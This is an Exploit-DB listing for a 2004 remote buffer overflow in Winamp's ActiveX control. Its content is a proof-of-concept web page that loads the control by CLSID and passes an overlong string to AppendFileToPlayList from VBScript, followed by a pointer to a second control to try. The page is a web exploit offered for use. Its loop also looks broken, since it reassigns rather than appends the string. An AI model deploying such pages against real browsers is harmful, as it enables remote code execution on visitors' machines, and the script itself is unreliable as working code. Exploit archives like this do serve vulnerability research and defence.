NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow

EDB-ID:

24571

CVE:

N/A




Platform:

Windows

Date:

2004-09-03


source: https://www.securityfocus.com/bid/11107/info

Nullsoft Winamp ActiveX Control is alleged to be prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code.

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=Kylie height=250 hspace=20 width=250 align=left classid=clsid:FA3662C3-
B8E8-11D6-A667-0010B556D978>
<PARAM NAME="Initialize" VALUE="">
</OBJECT>
<SCRIPT language=vbscript>

dim xint
dim haveIgotthebestbumorwhat
for xint = 1 to 5000
haveIgotthebestbumorwhat = foo & "K"
next
Kylie.AppendFileToPlayList haveIgotthebestbumorwhat

</SCRIPT>
</BODY></HTML>

If you're bored could also try -

CoAxTrack Class - {B9F3009B-976B-41C4-A992-229DCCF3367C}.